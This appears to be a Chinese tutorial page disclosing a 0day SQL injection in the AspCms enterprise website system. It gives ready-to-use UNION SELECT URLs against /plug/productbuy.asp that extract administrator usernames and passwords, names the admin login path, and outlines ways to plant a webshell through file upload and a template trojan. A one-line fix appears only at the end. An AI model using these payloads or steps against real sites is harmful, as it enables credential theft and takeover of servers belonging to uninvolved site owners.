手机
当前位置:查字典教程网 > >脚本攻防 >aspcms企业建站系统0day漏洞介绍
aspcms企业建站系统0day漏洞介绍
摘要:漏洞出现在/plug/productbuy.asp对接收的参数id没有进行过滤而导致的注入漏洞注入后的页面有跳转,所以要快,建议用快捷键复制...

漏洞出现在

/plug/productbuy.asp

对接收的参数id没有进行过滤而导致的注入漏洞

注入后的页面有跳转,所以要快,建议用快捷键复制

爆用户名

/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,

26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4...........

爆密码

/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,

26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

后台登录地址:/admin/login.asp

后台拿shell

1、直接上传.asp;x

2、系统配置信息

3、模版管理新建1.asp模板,内容写马的内容.

修复方法: id用cint(request("id"))

【aspcms企业建站系统0day漏洞介绍】相关文章:

常用的一些注入命令 方便一下大家

万博企业网站管理系统注入漏洞(MemberLogin.asp)

php disable_functions 函数列表

网站后台脚本漏洞挖掘技巧,基于工具快速挖掘

PHP Webshell 下的端口反弹方法

serv-u最新通杀所有版本0day asp代码

科讯KESION CMS最新版任意文件上传WEBSHELL漏洞

upfile asp文件上传 又一奇迹般的突破

BOSSI 公司企业网站管理系统注入&上传漏洞利用

ewebeditor 上传遇到防火墙限制的解决办法 图文

精品推荐
分类导航